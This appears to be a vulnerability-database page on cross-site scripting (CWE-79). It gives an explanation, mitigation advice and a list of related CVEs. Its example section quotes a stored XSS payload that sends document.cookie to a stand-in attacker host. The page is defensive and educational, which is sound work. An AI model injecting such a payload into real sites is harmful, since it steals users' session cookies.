Fallos del tipo CWE-79

28.608 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-0831MEDIUMCross-site Scripting (XSS) - Stored in pimcore/pimcoreEPSS 1.3%CVE-2020-15155HIGHCross-Site Scripting in baserCMSEPSS 1.3%CVE-2024-49379MEDIUMRemote Code Execution (RCE) via Cross-Site Scripting (XSS) in UmbrelEPSS 1.3%CVE-2011-1497—A cross-site scripting vulnerability flaw was found in the auto_link function in Rails before version 3.0.6.EPSS 1.3%CVE-2021-24693—Simple Download Monitor < 3.9.5 - Contributor+ Stored Cross-Site Scripting via File ThumbnailEPSS 1.3%CVE-2008-0642MEDIUMCross-site scripting (XSS) vulnerability in files created by Adobe RoboHelp 6 and 7, possibly involving use of a (1) WebHelp5 (WebHelp5Ext) EPSS 1.3%CVE-2024-34061MEDIUMReflected cross site scripting in changedetection.ioEPSS 1.3%CVE-2017-16771—Cross-site scripting (XSS) vulnerability in Log Viewer in Synology Photo Station before 6.8.3-3463 and before 6.3-2971 allows remote attackeEPSS 1.3%CVE-2024-5961MEDIUMReflected XSS in 2ClickPortalEPSS 1.3%CVE-2019-19293MEDIUMA vulnerability has been identified in Control Center Server (CCS) (All versions < V1.5.0). The web interface of the Control Center Server (EPSS 1.3%CVE-2023-30627CRITICALjellyfin-web has a stored cross-site scripting vulnerability in devices.jsEPSS 1.3%CVE-2006-5632MEDIUMCross-site scripting (XSS) vulnerability in change_pass.php in iG Shop 1.4 allows remote attackers to inject arbitrary web script or HTML viEPSS 1.3%CVE-2026-7026MEDIUMD-Link DGS-3420 System Information Settings cross site scriptingEPSS 1.3%CVE-2023-50250MEDIUMCross-Site Scripting vulnerability when Import xml template fileEPSS 1.3%CVE-2026-61876CRITICALLuCI DHCPv6 Lease Hostname Stored Cross-Site ScriptingEPSS 1.3%CVE-2023-44393CRITICALPiwigo Reflected XSS vulnerabilityEPSS 1.3%CVE-2023-36016MEDIUMMicrosoft Dynamics 365 (on-premises) Cross-site Scripting VulnerabilityEPSS 1.3%CVE-2021-20280—Text-based feedback answers required additional sanitizing to prevent stored XSS and blind SSRF risks in moodle before 3.10.2, 3.9.5, 3.8.8,EPSS 1.3%CVE-2023-29528CRITICALCross-site Scripting in org.xwiki.commons:xwiki-commons-xmlEPSS 1.3%CVE-2012-10032HIGHMaxthon3 about:history XCS Trusted Zone Code ExecutionEPSS 1.3%